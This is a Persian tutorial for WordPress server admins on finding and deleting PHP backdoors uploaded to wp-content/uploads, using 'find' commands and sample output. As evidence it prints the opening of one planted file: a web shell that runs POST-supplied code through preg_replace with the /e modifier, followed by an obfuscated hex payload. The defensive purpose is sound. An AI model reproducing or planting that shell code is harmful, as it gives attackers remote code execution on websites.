اگر شما دارای تعدادی زیادی وبسایت که با وردپرس ایجاده شده اند هستید، بارها ممکن است با این مشکل روبرو شده باشید، بطور کلی بیشتر این هکرهای عزیز به دنبال فولدر هایی می گردند که سطح درستی آنها 777 می باشد، که در وردپرس رایج ترین مسیر /wp-content/uploads/ می باشد؛ بنابراین لازم است که به دنبال فایل های آپلود شده در این مسیر بر حسب تاریخ بگردیم، بدین منظور درshell دستور زیر را اجرا کنید :
find ./public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
به عنوان نمونه، نتیجه بررسی به صورت زیر می باشد:
2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php 2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php 2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php 2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php 2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php 2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php 2015-10-16 12:25:01 ./wp-content/uploads/about_us.php 2015-10-16 12:25:01 ./wp-content/uploads/contactus.php 2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php 2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php 2015-10-16 12:25:01 ./wp-content/uploads/team.php 2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php
می توانید با دستور head خطوط اولیه این فایل ها را جهت بررسی محتوای آن مشاهده نمایید.
به عنوان مثال در فایل blog84.php بدین صورت می باشد:
head ./wp-content/uploads/2013/05/blog84.php <?php @preg_replace('/(.*)/e', @$_POST['dnrdztvetxn'], ''); $GLOBALS['af4569'] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5
همانطور که مشاهده می نماید این فایل ها لازم است که سریع حذف شوند.
می توانید با دستور rm filename فایل مورد نظر (بعنوان مثال: blog84.php ) را حذف نمایید.
همچنین شما میتوانید از طریق دستور زیر، تمام سرور خود را برای پیدا کردن فایل های مخرب بررسی کنید
find /home/*/domains/*/public_html/wp-content/uploads/ -type f -name '*.php' -printf '%TY-%Tm-%Td %TT %p\n' | sort
رعایت این موارد می تواند کمک زیادی برای جلوگیری از بلک لیست شدن آی پی میل سرور نماید.